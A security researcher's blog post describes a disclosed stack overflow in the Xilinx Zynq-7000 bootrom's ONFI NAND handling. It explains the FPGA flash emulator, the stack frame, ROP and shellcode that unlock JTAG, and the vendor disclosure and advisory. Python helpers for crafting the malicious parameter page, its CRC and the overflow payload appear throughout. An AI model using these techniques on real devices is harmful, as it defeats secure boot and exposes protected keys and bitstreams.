Introduction
Also known via DAAR-76201.
If you're just tuning in now and want context beyond "here's a bug in some rom code": Check out part 1 and part 2. I'll be here.
Now - The Zynq-7000 series provides a root-of-trust via the usual methods: eFuse array containing hashes and/or keys. The actual scheme seems solid - I'm absolutely no cryptographer - and the implementation details that Xilinx doesn't document don't really expose anything particularly damning.
TL;DR // Executive Summary
- Zynq secure boot is not sufficient to protect secrets against an attacker with physical access. If you rely on this root of trust to protect a secret that is not unique per-device, reconsider your architecture.
- The vulnerable code also exists in Xilinx's 'embeddedsw' HAL. Software built from Xilinx tools prior to the release xilinx_v2021.1 without backported fixes is vulnerable in exactly the same way.
- This exploit uses the Zynq's NAND/ONFI interface, so unless the target already exposes those nets, it's unlikely to make a good modchip. Bear in mind the previous point, however.
- Yes, you can recover bitstreams this way - I have not yet tried, but there is no reason that shouldn't work.
Bug
When the Zynq initially scans for ONFI devices, it grabs the ONFI parameter page and populates local copies of some of these fields (this function is nearly identical to Onfi_NandInit in the Xilinx xnandps driver).
The Zynq ROM ONFI driver fails to do any validation of this parameter page. In normal flash devices this isn't configurable, but it's still technically untrusted data... And it has a plethora of interesting fields that nominally dictate the organization and layout of the flash device (ECC, bad blocks, spare area, and so on).
An "emulator" that controls all of these fields is required to exploit this, so we have to build one of those. Let's discuss that a little before exploring the vulnerability in detail.
Wait, ONFI?
ONFI is a standard (in that it is defined, not so much in that it is strictly followed) that describes nominally how to talk to unmanaged flash chips. On a board, chips supporting ONFI commonly look like this:
Commonly found in TSOP48 packages like this one
Think of it like the de facto "standard" that is how most serial (SPI) flash chips talk, except there are some older-school aspects like command/address latch strobes, and so forth. On the wire, a reset (0xFF) and read status (0x70) with response looks something like this:
The parameter page is a part of this standard which describes everything from physical characteristics to supported features. It's read with a special opcode (0xEC), plus an address (and I guess there's support for extended parameter pages? I didn't implement this, the Zynq doesn't use it). Of interest to us here (remember? writing an exploit) are bytes 80 through 99: These describe the number of bytes per various NAND primitive (page, LUN, block, spare page).
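To make the byte range concrete, here is a minimal sketch of reading and patching bytes 80 through 99 of a 256-byte parameter page. It assumes the field order given in the ONFI specification (data bytes per page, spare bytes per page, the two partial-page fields, pages per block, blocks per LUN), all little-endian. The field and function names are my own labels, not identifiers from the bootrom or from Xilinx's driver.

```python
import struct

# Assumed layout of parameter page bytes 80..99 (ONFI "memory organization" block).
GEOMETRY_OFFSET = 80
GEOMETRY_FORMAT = "<IHIHII"  # little-endian, no padding: 4+2+4+2+4+4 = 20 bytes
GEOMETRY_FIELDS = (
    "data_bytes_per_page",
    "spare_bytes_per_page",
    "data_bytes_per_partial_page",
    "spare_bytes_per_partial_page",
    "pages_per_block",
    "blocks_per_lun",
)


def parse_geometry(param_page: bytes) -> dict:
    """Decode the geometry fields from a raw parameter page."""
    values = struct.unpack_from(GEOMETRY_FORMAT, param_page, GEOMETRY_OFFSET)
    return dict(zip(GEOMETRY_FIELDS, values))


def patch_geometry(param_page: bytes, **fields: int) -> bytes:
    """Return a copy of the page with the named geometry fields replaced."""
    geometry = parse_geometry(param_page)
    for name, value in fields.items():
        if name not in geometry:
            raise KeyError(f"unknown geometry field: {name}")
        geometry[name] = value
    page = bytearray(param_page)
    struct.pack_into(GEOMETRY_FORMAT, page, GEOMETRY_OFFSET,
                     *(geometry[name] for name in GEOMETRY_FIELDS))
    return bytes(page)


if __name__ == "__main__":
    blank = bytes(256)
    patched = patch_geometry(blank, data_bytes_per_page=2048,
                             spare_bytes_per_page=0x400)
    print(parse_geometry(patched))
```

Note that the spare-bytes field is only 16 bits wide, so an emulator can claim at most 0xFFFF spare bytes per page.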
I'll spare you the details of the ONFI emulation (and my code), but I glued together my emulation of the bare subset of ONFI commands needed to reach this point:
opcode | wat? |
---|---|
0x90 | Read device ID |
0xEC | Read parameter page |
0x00 | Page read |
0x30 | End page read |
0x70 | Status register read |
0xFF | Reset |
Not very many! ONFI allows for a couple commands during a busy cycle (ie: while buffering or erasing a page). Since the overflow is within the first page read ever submitted, I can just naively spit out the payload and ignore addressing entirely.
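For a feel of how little logic that command subset needs, here is a toy behavioural model in Python. It is a sketch only: the real emulator lives in an FPGA and has to deal with latch strobes, timing, and R/#B, none of which is modelled here. The class and method names are made up for illustration, and the status value 0xE0 (ready, not write-protected, no failure) is an assumption about what a host accepts.

```python
class OnfiModel:
    """Toy model of the six-command subset; not cycle-accurate."""

    STATUS_READY = 0xE0  # assumed: WP#, RDY and ARDY set, FAIL clear

    def __init__(self, device_id: bytes, param_page: bytes, payload: bytes):
        self.device_id = device_id
        self.param_page = param_page
        self.payload = payload
        self._out = b""   # bytes available to the host's data-out cycles
        self._pos = 0

    def _queue(self, data: bytes) -> None:
        self._out, self._pos = data, 0

    def command(self, opcode: int) -> None:
        """Handle a command-latch cycle."""
        if opcode == 0xFF:        # reset: drop anything queued
            self._queue(b"")
        elif opcode == 0x90:      # read device ID
            self._queue(self.device_id)
        elif opcode == 0xEC:      # read parameter page
            self._queue(self.param_page)
        elif opcode == 0x70:      # status register read
            self._queue(bytes([self.STATUS_READY]))
        elif opcode == 0x00:      # page read setup: nothing to return yet
            self._queue(b"")
        elif opcode == 0x30:      # end page read: payload becomes readable
            self._queue(self.payload)
        else:
            raise ValueError(f"unsupported opcode 0x{opcode:02X}")

    def address(self, value: int) -> None:
        """Address-latch cycles are accepted and ignored entirely."""

    def read(self, count: int) -> bytes:
        """Return up to `count` bytes of whatever is currently queued."""
        data = self._out[self._pos:self._pos + count]
        self._pos += len(data)
        return data


if __name__ == "__main__":
    nand = OnfiModel(b"\x01\x02", bytes(256), b"\xAA" * 16)
    nand.command(0x00)
    for cycle in range(5):
        nand.address(0x00)
    nand.command(0x30)
    print(nand.read(16).hex())
```

Ignoring the address cycles is what makes "naively spit out the payload" work: every page read returns the same bytes regardless of where the host thinks it is reading.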
Arguably, the worst part about this is that it requires soldering in an ONFI emulator (ie: another FPGA) - And ONFI flash is usually a cost reduction measure, so none of the nicer Zynq dev kits use it! Luckily I had one of those Antminer boards kicking around (featured previously!), and they boot off ONFI NAND, so a bit of hot air and a handful of bodge-wire joints later, it was broken out:
luckily, I could run the interface slowly enough that this worked...
detail of the flash breakout
I decided to build in a set of headers to hang my logic analyzer off of - The Saleae I used here is definitely overkill, but (especially when writing an exploit) better introspection is invaluable. Arguments may be made for using an ILA (Integrated Logic Analyzer) on the FPGA, but in my experience it introduces too much latency in the test-verify loop - I'd absolutely recommend a standalone device like this. I wrote much of the ONFI support and verified it in simulation, but not everything about the Zynq's flash controller is a) known and b) worth writing into a test harness!
For example: one amusing point was discovering that the NAND controller hardware in the Zynq won't complete a page read transaction unless you drive R/#B low (busy) for some period of time. That certainly wasn't in my test bench.
I wasn't ever busy, c'mon!
Exploit
Of particular (easiest-to-exploit) interest is SpareBytesPerPage - Everything else just needs to be legitimate enough to make it past some minimal checks. Since raw NAND is a disaster, it's not uncommon for the chips to have some built-in ECC, which would be really annoying. We can bypass all of the logic related to this just by reporting a manufacturer ID of any value but Micron's ID (0x2c).
Finally, there's a CRC at the end, which may be generated something like this:
import crcmod
onfi_crc = crcmod.mkCrcFun(0x18005, initCrc=0x4f4e, rev=False)
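If crcmod isn't installed, the same CRC is easy to compute by hand. The sketch below is a plain bit-by-bit CRC-16 with the polynomial and initial value from the line above (0x8005 with the implicit top bit, 0x4F4E, no reflection, no final XOR). It assumes the usual ONFI arrangement where the CRC covers bytes 0 through 253 of the parameter page and is stored little-endian in bytes 254 and 255. The function names are illustrative.

```python
import struct


def onfi_crc16(data: bytes, crc: int = 0x4F4E) -> int:
    """Bitwise CRC-16, polynomial 0x8005, MSB first, no final XOR."""
    for byte in data:
        crc ^= byte << 8
        for _ in range(8):
            if crc & 0x8000:
                crc = ((crc << 1) ^ 0x8005) & 0xFFFF
            else:
                crc = (crc << 1) & 0xFFFF
    return crc


def seal_parameter_page(page: bytes) -> bytes:
    """Recompute the trailing CRC of a 256-byte parameter page."""
    if len(page) != 256:
        raise ValueError("expected a 256-byte parameter page")
    body = page[:254]
    return body + struct.pack("<H", onfi_crc16(body))


def crc_is_valid(page: bytes) -> bool:
    """Check the stored CRC against the page contents."""
    if len(page) != 256:
        return False
    (stored,) = struct.unpack_from("<H", page, 254)
    return stored == onfi_crc16(page[:254])


if __name__ == "__main__":
    page = bytearray(256)
    page[0:4] = b"ONFI"
    sealed = seal_parameter_page(bytes(page))
    print(f"crc=0x{onfi_crc16(sealed[:254]):04X} valid={crc_is_valid(sealed)}")
```

Any edit to the page, including a new spare size, means the CRC has to be recomputed before the page is served.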
Once the NAND driver's context is populated, and after some housekeeping (XNandPs_CfgInitialize), the bootrom searches for the ONFI "Bad Block Table".
Since NAND is so error-prone, there's a standardized (ish) method to provide a bitmap of known unusable whole blocks, and this is stored (along with ECC data) in the "spare area" of flash pages. Usually this is all nicely aligned so that addressing is somewhat as simple as masking out a couple bits, but the important part here is that this is the first time a value from our parameter page is used - XNandPs_ReadSpareBytes does no sanity checks before happily reading the entire spare page (per the descriptor) into the supplied buffer.
Since the buffer in question is a 0x200 long stack variable in XNandPs_SearchBbt's frame, we have a trivial stack smash with very good control.
(It's even better than that - LR gets incidentally set to the top of this buffer... I didn't end up using this. Potentially this lets you skip the whole ropchain!) We can even control the return value of XNandPs_ReadSpareBytes by supplying or not supplying the bad block table signature (Bbt0) while still triggering the overflow. Register control is likewise very strong: R4 through R11 are saved and restored from the smashed frame:
[sp+0x000]
[sp+0x008] destination buffer
[...]
[sp+0x..4] other vars
[sp+0x..8] saved r4
[sp+0x..C] saved r5
[...]
[sp+0x..C] saved pc
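The frame layout above translates fairly directly into a payload builder. This is a rough sketch under stated assumptions: the distance between the end of the 0x200 buffer and the saved registers is elided in the layout, so gap_to_saved_regs is a hypothetical parameter that has to be measured on the target, and the function name is made up. Words are packed little-endian.

```python
import struct

BUFFER_SIZE = 0x200  # size of the stack buffer, from the text
MAX_SPARE = 0xFFFF   # spare bytes per page is a 16-bit parameter page field


def build_spare_page(gap_to_saved_regs: int, saved_regs: list, pc: int) -> bytes:
    """Lay out spare-area bytes that overwrite r4..r11 and the saved pc.

    gap_to_saved_regs is HYPOTHETICAL: the number of bytes of "other vars"
    between the end of the buffer and saved r4. It is not given in the text.
    """
    if len(saved_regs) != 8:
        raise ValueError("expected eight values for r4..r11")
    if gap_to_saved_regs < 0:
        raise ValueError("gap cannot be negative")
    page = b"\x00" * (BUFFER_SIZE + gap_to_saved_regs)  # fills buffer and locals
    page += struct.pack("<8I", *saved_regs)              # saved r4..r11
    page += struct.pack("<I", pc)                        # saved pc
    if len(page) > MAX_SPARE:
        raise ValueError("payload does not fit in a 16-bit spare size")
    return page


if __name__ == "__main__":
    # Placeholder gap and register values, purely for illustration.
    payload = build_spare_page(0x10, [0x41414141] * 8, 0x000006A0)
    print(f"claim SpareBytesPerPage = 0x{len(payload):X}")
```

The length of the returned bytes is the smallest SpareBytesPerPage value the emulator needs to advertise for the saved pc to be reached.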
After gluing in some BRAM and a bit of JTAG code to push payloads up to the FPGA, I got the bootrom to crash (!!). I experimented with the over-read size, and observed the results on the wire with the logic analyzer: When an invalid pointer was accessed, the ROM would fault and wouldn't make further ONFI transactions. I used this "oracle" to verify the stack frame layout from my reverse engineering.
...And then, at some point I just filled the spare page with 0x000006a0 (uart_init) hoping to hit a saved LR or PC, and this popped out:
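The "fill everything with one address" trick is a one-liner, but byte order matters. A minimal sketch, assuming 32-bit little-endian words and a spare page length that is a multiple of four (the length used below is an arbitrary placeholder, not the value from the real exploit):

```python
import struct

UART_INIT = 0x000006A0  # address quoted in the text


def spray(address: int, length: int) -> bytes:
    """Fill `length` bytes with a repeated little-endian 32-bit address."""
    if length % 4:
        raise ValueError("length must be a multiple of 4")
    return struct.pack("<I", address) * (length // 4)


if __name__ == "__main__":
    page = spray(UART_INIT, 0x400)  # 0x400 is a placeholder length
    print(page[:8].hex())
    # The same value packed big-endian lands as a different pointer entirely.
    print(struct.pack(">I", UART_INIT).hex())
```

Whichever saved LR or PC slot the overflow reaches, it then holds the same target, so no exact frame offset is needed for a first test.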
Obviously this isn't sufficient - The Zynq boots with JTAG disabled and all kinds of interesting security features unlocked, plus it would be fun to debug the bootrom...
To rapidly prototype the payload/shellcode, I put together a tiny makefile to convince the linker to base everything at 0 as initially I had no idea where in RAM I was - I tried calculating it at some point and ended up being wildly off. This breaks indirect jumps, but that's trivial enough to work around (and uhm, lazy). Here's a copy, in case it's useful to someone:
as = arm-none-eabi-as
objcopy = arm-none-eabi-objcopy
objdump = arm-none-eabi-objdump
ld = arm-none-eabi-ld
proj = sc

.PHONY: all disas clean

all: $(proj).bin

# Disassemble the flat binary
disas: $(proj).bin
	$(objdump) -D $(proj).bin -b binary -m armv7

# Assemble, link with text and data based at 0, then flatten to a raw binary
$(proj).bin: $(proj).s
	$(as) -o $(proj).o $(proj).s
	$(ld) $(proj).o -Ttext 0 -Tdata 0 -o $(proj).elf
	$(objcopy) -O binary $(proj).elf $(proj).bin

clean:
	rm -f $(proj).o $(proj).elf $(proj).bin
Although I had control, I was running into issues with the exploit. The goal was to poke a stub into RAM (push sp; pop pc), and jump right into the stack that way - but it wasn't working.
The ROP seemed fine, but as soon as I jumped into shellcode everything broke. Thankfully I had one bit of output - I could jump to the UART bootloader used earlier and cause it to bring up the UART and emit the "XLNX-ZYNQ" identification string.
After chasing the issue through what I was certain was caching (no: they're off), then ordering (easy to ROP to dsb/isb), then MMUs/page permissions (off, wrote a chain to reconfigure them nevertheless)...I had the endianness flipped (thank you pwntools). So, lots of this could've been simpler...
Really, with all that effort it would've been simpler to just write a chain to re-enable JTAG and debug it normally, now that I think of it!
Nevertheless, once my shellcode worked I could clean everything up and figure out where in memory I was. One thing to be aware of at this point is that any exceptions will cause the Zynq to reboot. The IVT can be remapped, but this comes at the cost of remapping some RAM away from the ROM. Perhaps this could be solved by setting up a couple virtual pages...But I am quite satisfied where things are, so you can do that ;)
Another benefit of using a "proper" assembler to build the payload is that I had access to handy macros for math and padding - arm-none-eabi-as is better at simple addition than I am, especially in the wee hours. I don't think there's any reason to release the whole ONFI tool, but here's the assembler file I used to build the payload.
Zynq Bootrom unlocked:
sctlr: 0x8C50079, devcfg: 0x4E00607F, ocmcfg: 0x0
The shellcode simply unlocks JTAG, and spits out a few registers of interest: devcfg contains the fabric config, including AES enable bits. sctlr is the ARM core register which contains caching, prediction, and virtual memory enable bits. ocmcfg is just the OCM configuration register. Everything in the payload is already documented in the TRM, but perhaps it makes this easier to follow.
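For anyone who wants to pick the sctlr value apart, here is a small decoder for the enable bits mentioned above. The bit positions are the ARMv7-A SCTLR ones (M = MMU, C = data cache, Z = branch prediction, I = instruction cache); the function name is made up, and the devcfg and ocmcfg fields are left out since their layouts are Zynq-specific and best read from the TRM.

```python
# ARMv7-A SCTLR bit positions for the enables discussed in the text.
SCTLR_BITS = {
    "M": 0,   # MMU enable
    "C": 2,   # data/unified cache enable
    "Z": 11,  # branch prediction enable
    "I": 12,  # instruction cache enable
}


def decode_sctlr(value: int) -> dict:
    """Return each named enable bit of an SCTLR value as a bool."""
    return {name: bool((value >> bit) & 1) for name, bit in SCTLR_BITS.items()}


if __name__ == "__main__":
    for name, enabled in decode_sctlr(0x8C50079).items():
        print(f"{name}: {'set' if enabled else 'clear'}")
```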
Finally, I want to say that I cannot overstate how many random little rabbitholes I spent time chasing down, or how many tiny little things prevented another bug from being exploitable. So it goes.
Demo?
Demo:
🦀???
Oh, very well. Somewhere in the middle of procrastinating on this and...other projects, I hacked together a self-hosted disassembler payload for this exploit. Of course, it's written in Rust:
You can find that questionable decision here, should you wish.
Disclosure notes
I don't think the exact timeline is particularly useful - Suffice to say that while Xilinx was difficult to initially get ahold of, they were usually responsive, always competent and straightforward. They did pay out a bounty. The bug was reproduced in a couple weeks, and their advisory was published just inside of 90 days. Good work :)